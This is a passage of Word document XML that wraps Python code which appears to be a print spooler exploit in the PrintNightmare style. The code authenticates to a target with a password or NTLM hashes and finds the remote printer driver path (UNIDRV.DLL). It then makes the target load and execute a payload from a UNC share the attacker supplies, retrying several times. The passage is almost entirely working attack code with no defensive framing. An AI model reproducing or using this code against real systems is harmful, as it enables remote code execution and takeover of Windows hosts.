    <w:p w14:paraId="17771333" w14:textId="6C643AE7" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>options.target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>).groups('')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E285974" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="7CFC8D61" w14:textId="66F08AC6" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>#In case the password contains '@'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC8C50F" w14:textId="27464747" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>if '@' in address:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543CD658" w14:textId="6EAF0542" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">password = password + '@' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>address.rpartition</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>('@')[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF7DE96" w14:textId="51474F31" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">address = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>address.rpartition</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>('@')[2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C22FA8F" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="34F3002A" w14:textId="6ED4A54F" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>options.target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695A1848" w14:textId="672711C1" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>options.target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> = address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406277DE" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="1C9D6734" w14:textId="0DAE14B3" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>if domain is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8CEA6A" w14:textId="14B9B6F1" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>domain = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0209CB04" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="4CBDF826" w14:textId="7D701760" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">if password == '' and username != '' and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>options.hashes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE59D47" w14:textId="5FBF3ABD" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>getpass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>getpass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39CF849C" w14:textId="6D5B19B6" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">password = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>getpass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>("Password:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691F2A03" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="6B9BB105" w14:textId="6C845555" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>options.hashes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> is not None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE2F74A" w14:textId="155CC85F" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>lmhash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>nthash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>options.hashes.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>(':')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7435B011" w14:textId="058C0124" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:lastRenderedPageBreak/>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB06261" w14:textId="37BE7807" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>lmhash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBAF3C9" w14:textId="6C352D02" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>nthash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2749F8" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="444DBB49" w14:textId="447E7484" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>connect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7516B3A9" w14:textId="3CDFF569" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>dce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve"> = connect(username, password, domain, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>lmhash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>nthash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>options.target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00923766">
        <w:t>options.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00923766">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F759ED" w14:textId="2BF5A924" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>#handle = "\\\\{0}\x00".format(address)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66419291" w14:textId="5FB5D085" w:rsidR="005A0B58" w:rsidRPr="00923766" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00923766">
        <w:t>handle = NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA0AABA" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="00D8678B"/>
    <w:p w14:paraId="3AC2A18C" w14:textId="608E484A" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C449AB">
        <w:t>#find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BC5AFD" w14:textId="287C3ADF" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">if not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>options.pDriverPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFB81A9" w14:textId="3D04E99A" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C449AB">
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAA23DD" w14:textId="2C793961" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">blob = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>getDriver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>dce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>, handle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002E8552" w14:textId="40DC9CC9" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>pDriverPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve"> = str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>pathlib.PureWindowsPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>(blob['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>DriverPathArray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>']).parent) + '\\UNIDRV.DLL'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BD3877" w14:textId="5761C94B" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C449AB">
        <w:t>if not "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>FileRepository</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">" in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>pDriverPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2BDE02" w14:textId="2CECAA5F" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">"[-] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>pDriverPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve"> {0}, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>expected :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>\\Windows\\System32\\DriverStore\\FileRepository\\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>.....".format</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>(pDriverPath))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F0E472" w14:textId="7207FCDB" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">print("[-] Specify </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>pDriverPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve"> manually")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1278E726" w14:textId="5A63D37E" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>sys.exit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4348487D" w14:textId="08220292" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C449AB">
        <w:t>except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4711B947" w14:textId="05301E9C" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">print('[-] Failed to enumerate remote </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>pDriverPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFDB8C8" w14:textId="441871E9" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C449AB">
        <w:t>print(str(e))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A677EB" w14:textId="5960E590" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="00D8678B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>sys.exit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6253531A" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="005A0B58">
      <w:r w:rsidRPr="00C449AB">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A7F964" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="005A0B58">
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>pDriverPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>options.pDriverPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14174F37" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="005A0B58"/>
    <w:p w14:paraId="5D46BB4F" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="005A0B58">
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">    if "\\\\" in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>options.share</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8CA6BA" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="005A0B58">
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>options.share</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>options.share.replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>("\\\\","\\??\\UNC\\")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E53664" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="005A0B58"/>
    <w:p w14:paraId="4F6467E1" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="005A0B58">
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">    print("[+] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>pDriverPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve"> Found {0}".format(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>pDriverPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F1FC80" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="005A0B58">
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">    print("[*] Executing {0}".format(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>options.share</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3370AB91" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="005A0B58"/>
    <w:p w14:paraId="0472B731" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="005A0B58">
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">    #re-run if stage0/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>stageX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve"> fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEA7A4A" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="005A0B58">
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">    print("[*] Try 1...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21623829" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="005A0B58">
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">    main(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>dce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>pDriverPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>options.share</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5011371D" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="005A0B58">
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">    print("[*] Try 2...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7C328B" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="005A0B58">
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">    main(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>dce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>pDriverPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>options.share</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C449AB">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AABE4A0" w14:textId="77777777" w:rsidR="005A0B58" w:rsidRPr="00C449AB" w:rsidRDefault="005A0B58" w:rsidP="005A0B58">
      <w:r w:rsidRPr="00C449AB">
        <w:t xml:space="preserve">    print("[*] Try 3...")</w:t>
      </w:r>
